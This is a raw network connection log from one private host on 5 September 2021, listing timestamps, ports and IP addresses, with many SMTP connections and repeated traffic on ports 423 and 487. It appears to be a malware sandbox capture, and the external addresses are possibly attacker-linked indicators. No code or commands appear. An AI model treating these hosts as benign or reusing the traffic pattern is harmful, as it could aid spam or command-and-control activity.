Sep 5, 2021 15:50:17.272351027 CEST	49787	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.272357941 CEST	49788	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:17.272911072 CEST	49797	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:17.273266077 CEST	49798	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.273657084 CEST	49799	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:17.287947893 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:17.297794104 CEST	423	49787	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:17.297866106 CEST	49787	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.298418045 CEST	423	49798	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:17.298508883 CEST	49798	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.303793907 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.303904057 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.304444075 CEST	423	49788	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:17.304526091 CEST	49788	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:17.305409908 CEST	423	49799	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:17.305483103 CEST	49799	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:17.312418938 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.313297033 CEST	423	49797	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:17.313371897 CEST	49797	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:17.315867901 CEST	423	49786	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:17.315938950 CEST	49786	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:17.323848009 CEST	423	49798	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:17.323988914 CEST	49798	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.337677002 CEST	423	49799	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:17.349241972 CEST	423	49798	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:17.354028940 CEST	423	49797	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:17.401736021 CEST	49799	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:17.401962996 CEST	49797	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:17.402468920 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:17.402563095 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:17.408438921 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.423317909 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.433866978 CEST	423	49799	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:17.442372084 CEST	423	49797	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:17.462129116 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.466105938 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.497112036 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.497234106 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.520307064 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.537985086 CEST	49790	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:17.538013935 CEST	49791	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:17.538583040 CEST	49801	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:17.538937092 CEST	49802	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:17.544154882 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.597631931 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.597749949 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.606024027 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.606057882 CEST	423	49790	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:17.606177092 CEST	423	49802	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:17.606184959 CEST	49790	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:17.606281996 CEST	49802	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:17.606406927 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.607435942 CEST	423	49791	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:17.607549906 CEST	49791	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:17.611479998 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.611521006 CEST	423	49801	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:17.611594915 CEST	49801	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:17.623739958 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.652396917 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.665107012 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.673902035 CEST	423	49802	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:17.674176931 CEST	49802	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:17.674257994 CEST	49793	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.674760103 CEST	49804	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.680083036 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.685228109 CEST	423	49801	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:17.685501099 CEST	49801	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:17.718522072 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.720968008 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.722491026 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:17.725989103 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.729263067 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.733187914 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.733252048 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.734735012 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:17.741565943 CEST	423	49802	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:17.744344950 CEST	423	49793	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.744448900 CEST	49793	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.748560905 CEST	423	49804	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.748646975 CEST	49804	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.758347034 CEST	423	49801	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:17.783240080 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.795885086 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.807846069 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.807888031 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.808152914 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.808187962 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.818566084 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.822330952 CEST	423	49804	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.822509050 CEST	49804	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.839138985 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.839351892 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839431047 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839492083 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839550972 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839621067 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839678049 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839735031 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.839793921 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.850326061 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.853295088 CEST	25	49794	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:17.854159117 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.854188919 CEST	25	49794	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:17.854248047 CEST	49794	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:17.868868113 CEST	49794	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:17.873336077 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:17.873723030 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:17.887681961 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:17.895955086 CEST	423	49804	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.913331032 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.913542986 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.946322918 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.957355976 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.957390070 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.957454920 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.969594002 CEST	49800	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.975502014 CEST	49798	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:17.991219997 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:18.000868082 CEST	423	49798	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.000961065 CEST	49798	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.015254974 CEST	25	49794	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:18.026031017 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.034532070 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.043303013 CEST	487	49800	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:18.084878922 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.150535107 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.150561094 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.150633097 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.150674105 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.150787115 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.162811041 CEST	49805	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.176778078 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.176820040 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:18.178685904 CEST	49797	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.178713083 CEST	49799	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.179243088 CEST	49806	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.179673910 CEST	49807	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.189215899 CEST	423	49805	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.189373016 CEST	49805	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.190495968 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.210726023 CEST	423	49799	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.210824013 CEST	49799	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.210899115 CEST	423	49807	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.210987091 CEST	49807	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.214514971 CEST	423	49805	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.214700937 CEST	49805	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.219176054 CEST	423	49797	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.219269037 CEST	49797	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.220299006 CEST	423	49806	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.220417976 CEST	49806	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.239578009 CEST	423	49805	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.240680933 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.242259979 CEST	423	49807	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.242463112 CEST	49807	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.243926048 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.244365931 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.261704922 CEST	423	49806	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.261933088 CEST	49806	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.273348093 CEST	423	49807	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.273998976 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.294138908 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.294262886 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.302881002 CEST	423	49806	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.315354109 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.327761889 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.327785015 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.327797890 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.327810049 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.327842951 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.348625898 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.356970072 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.360240936 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.413088083 CEST	49802	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.413100958 CEST	49801	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:18.413696051 CEST	49809	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:18.414036989 CEST	49810	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.414927959 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.417889118 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.426457882 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.446022987 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.446049929 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.446197033 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.455368996 CEST	49803	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.477965117 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.480115891 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.480987072 CEST	423	49802	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.481081963 CEST	49802	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.482023954 CEST	423	49810	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.482126951 CEST	49810	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.485373020 CEST	423	49809	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:18.485460043 CEST	49809	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:18.486794949 CEST	423	49801	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:18.486874104 CEST	49801	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:18.496170044 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.496192932 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:18.509020090 CEST	25	49803	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.514022112 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:18.535371065 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.549705029 CEST	423	49810	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.549963951 CEST	49810	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.550031900 CEST	49804	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:18.550553083 CEST	49811	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:18.555078030 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:18.556664944 CEST	423	49809	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:18.556881905 CEST	49809	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:18.617355108 CEST	423	49810	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.623400927 CEST	423	49811	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:18.623495102 CEST	49811	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:18.623682022 CEST	423	49804	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:18.623735905 CEST	49804	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:18.628468037 CEST	423	49809	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:18.640979052 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:18.673224926 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.673255920 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.673295021 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.673319101 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.673378944 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.694426060 CEST	49805	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.694484949 CEST	49807	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.694489956 CEST	49806	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.695046902 CEST	49813	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.695468903 CEST	49814	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.695883989 CEST	49815	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.696851969 CEST	423	49811	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:18.697050095 CEST	49811	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:18.719516993 CEST	423	49805	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.719634056 CEST	49805	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.720606089 CEST	423	49814	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.720691919 CEST	49814	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.725691080 CEST	423	49807	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.725759983 CEST	49807	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.726157904 CEST	423	49815	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.726229906 CEST	49815	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.735585928 CEST	423	49813	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.735678911 CEST	49813	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.741751909 CEST	423	49806	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.741959095 CEST	49806	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.748755932 CEST	423	49814	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.748977900 CEST	49814	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:18.756736994 CEST	423	49815	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.757055044 CEST	49815	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:18.770096064 CEST	423	49811	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:18.774168015 CEST	423	49814	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:18.776690006 CEST	423	49813	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.776878119 CEST	49813	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:18.787420988 CEST	423	49815	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:18.804150105 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:18.804255962 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:18.810363054 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.810386896 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.810396910 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.810415030 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.810430050 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:18.811244011 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.814554930 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.817584038 CEST	423	49813	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:18.836786985 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.913146973 CEST	49810	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.913779020 CEST	49816	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.975403070 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.975440025 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:18.975538015 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.975719929 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:18.981719971 CEST	423	49810	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.981750965 CEST	423	49816	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:18.981847048 CEST	49810	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:18.981884003 CEST	49816	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:19.024835110 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.049757957 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.049911022 CEST	423	49816	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:19.050074100 CEST	49816	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:19.050151110 CEST	49809	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.050226927 CEST	49811	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.050607920 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:19.050642967 CEST	49818	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.051229000 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.103874922 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.104327917 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.113714933 CEST	25	49796	54.162.196.70	192.168.2.4
Sep 5, 2021 15:50:19.117330074 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.117355108 CEST	423	49816	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:19.117435932 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.119983912 CEST	423	49818	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:19.120114088 CEST	49818	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.121537924 CEST	423	49809	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:19.121611118 CEST	49809	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.122489929 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:19.122602940 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.123575926 CEST	423	49811	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:19.123723030 CEST	49811	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.167481899 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.183809042 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:19.188114882 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:19.189831972 CEST	423	49818	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:19.194360971 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:19.201392889 CEST	49818	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.201428890 CEST	49813	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.201457024 CEST	49814	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.201472044 CEST	49815	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.201944113 CEST	49820	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.202356100 CEST	49821	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.202867985 CEST	49822	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.202995062 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.228123903 CEST	423	49814	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:19.228677988 CEST	423	49821	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:19.228831053 CEST	49821	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.233208895 CEST	423	49815	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:19.234702110 CEST	49814	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.234726906 CEST	49815	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.235276937 CEST	423	49822	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:19.235358000 CEST	49822	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.239106894 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.239139080 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.242010117 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.242027998 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.242041111 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.243356943 CEST	423	49813	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:19.243458986 CEST	423	49820	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:19.243458986 CEST	49813	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.243864059 CEST	49820	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.245929956 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:19.247823954 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.248133898 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.254021883 CEST	423	49821	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:19.261969090 CEST	49821	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.267057896 CEST	423	49822	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:19.267570972 CEST	49822	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.271370888 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:19.271451950 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:19.271965027 CEST	423	49818	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:19.275742054 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:19.284899950 CEST	423	49820	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:19.285254002 CEST	49820	423	192.168.2.4	95.216.195.92
